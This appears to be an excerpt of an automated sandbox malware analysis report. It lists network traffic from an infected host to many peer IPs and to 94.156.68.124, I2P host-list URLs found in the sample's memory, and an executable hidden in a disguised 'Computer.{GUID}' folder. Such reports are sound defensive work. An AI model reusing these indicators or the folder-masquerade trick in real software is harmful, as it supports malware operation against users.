Source: global trafficUDP traffic: 192.168.2.7:21264 -> 185.128.245.162:25107
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 107.189.6.31:23012
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 99.234.18.44:23154
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 135.181.40.188:13568
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 176.109.240.152:23773
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 86.106.93.104:14840
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 24.231.176.11:22951
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 99.252.228.84:23131
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 85.239.63.250:26748
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 119.13.124.67:11313
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 213.145.125.139:21689
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 2.177.52.177:14810
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 78.47.80.55:12207
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 92.95.33.134:38552
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 81.183.201.129:9732
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 47.250.187.161:27292
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 85.239.53.47:28583
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 212.118.52.164:26199
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 188.89.23.222:19229
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 108.227.133.164:21344
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 217.10.112.72:10706
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 68.1.55.11:26636
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 5.19.249.240:19209
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 74.222.100.29:9686
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 190.22.24.78:33037
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 85.239.52.241:28764
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 159.196.73.121:50001
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 5.104.75.170:12345
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 154.61.58.162:23154
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 70.113.162.253:14928
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 85.6.171.9:19675
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 73.246.172.43:21102
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 68.65.178.44:23154
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 24.51.216.45:27375
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 138.74.168.219:16930
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 31.13.134.204:25275
Source: global trafficUDP traffic: 192.168.2.7:9290 -> 139.162.110.14:22293
Source: global trafficUDP traffic: 192.168.2.7:9290 -> 2.135.133.55:12868
Source: Joe Sandbox ViewASN Name: SHAWCA SHAWCA
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.68.124
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22705EEA recv,WSAGetLastError,29_2_00007FFB22705EEA
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000003.2310786980.000001FE46F13000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000003.2310853931.000001FE46F18000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: http://127.0.0.1:8118
Source: svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528358277.0000029864983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000028.00000002.2529174408.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528684973.0000029864E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 00000028.00000002.2529560921.0000029864EA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 00000028.00000003.2192382775.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192457979.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192566871.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpjl
Source: svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasi8
Source: svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169625242.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2204570380.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2003614074.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169519121.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050807188.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050828700.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169664337.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.0000029864088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000028.00000003.2224850593.0000029864907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
Source: svchost.exe, 00000028.00000003.2051472128.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225074479.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191388521.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050882822.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054077137.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054436645.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054374509.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225637609.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191695583.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225290392.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192265988.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2053957702.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2527937439.0000029864900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191499844.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2224850593.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054022632.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191764692.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169625242.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2204570380.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054546359.000002986490E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
Source: svchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesAAAA
Source: svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050807188.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050828700.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169664337.000002986490E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000028.00000003.2204570380.0000029864907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
Source: svchost.exe, 00000028.00000003.2051472128.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225074479.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191388521.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050882822.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054077137.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054436645.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054374509.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225637609.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191695583.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225290392.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192265988.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2053957702.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2527937439.0000029864900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191499844.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2224850593.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054022632.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191764692.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169625242.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2204570380.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054546359.000002986490E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 00000028.00000003.2003614074.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/28
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: svchost.exe, 00000028.00000002.2527468407.00000298640EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
Source: update.pkg.18.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 0000001D.00000002.2206219209.0000027B44860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtC
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtc
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtp/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: svchost.exe, 00000028.00000003.2051472128.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050882822.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054077137.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2053957702.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054022632.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528003910.0000029864913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 00000028.00000002.2528003910.0000029864913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 00000028.00000002.2528003910.0000029864913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169625242.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169664337.000002986490E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueure
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2527366735.00000298640B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: update.pkg.18.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: svchost.exe, 00000000.00000002.1365593351.000001A7F5013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
